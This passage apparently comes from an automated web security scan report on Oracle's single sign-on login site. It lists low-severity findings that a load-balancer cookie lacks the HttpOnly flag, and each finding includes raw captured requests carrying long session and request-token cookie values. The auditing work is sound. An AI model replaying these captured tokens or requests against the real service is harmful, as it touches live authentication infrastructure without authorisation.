hwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 319
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXC986uHK6EVADUS1EHWFB01t_cg
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a............................................MO.......MN.......PQ.......ST.........................................................................................................................
...[SNIP]...

13.105. https://login.oracle.com/mysso/sso_loginui/sso_check.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/sso_check.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/sso_check.js HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:14 GMT
Accept-Ranges: bytes
Content-Length: 7352
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBOd6uHK6EVADUS1EHWFB01t_bJ
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

<!--
//global js var
var isNav;

// on load, run this
function doLoad() {

MM_reloadPage(true);
isNav = (navigator.appName.indexOf("Netscape") !=-1);

//register event listeners
...[SNIP]...

13.106. https://login.oracle.com/mysso/sso_loginui/t-bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/t-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/t-bg.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 271
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBom6uHK6EVADUS1EHWFB01t_cA
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a..2...............................................................................................................................................................................................
...[SNIP]...

13.107. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/t-l-corner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/t-l-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:18 GMT
Accept-Ranges: bytes
Content-Length: 1005
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCSO6uHK6EVADUS1EHWFB01t_dD
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/

GIF89a..2...............................................................................................................................................................................................
...[SNIP]...

13.108. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/t-r-corner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/t-r-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:19 GMT
Accept-Ranges: bytes
Content-Length: 1021
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCXC6uHK6EVADUS1EHWFB01t_dP
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

GIF89a..2...............................................................................................................................................................................................
...[SNIP]...

13.109. https://login.oracle.com/oam/server/sso/auth_cred_submit

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /oam/server/sso/auth_cred_submit

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /oam/server/sso/auth_cred_submit HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
Content-Length: 2316
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_nr=1315343778351; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Fentry%2Fbea_welcome_and_oracles_middle; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA; 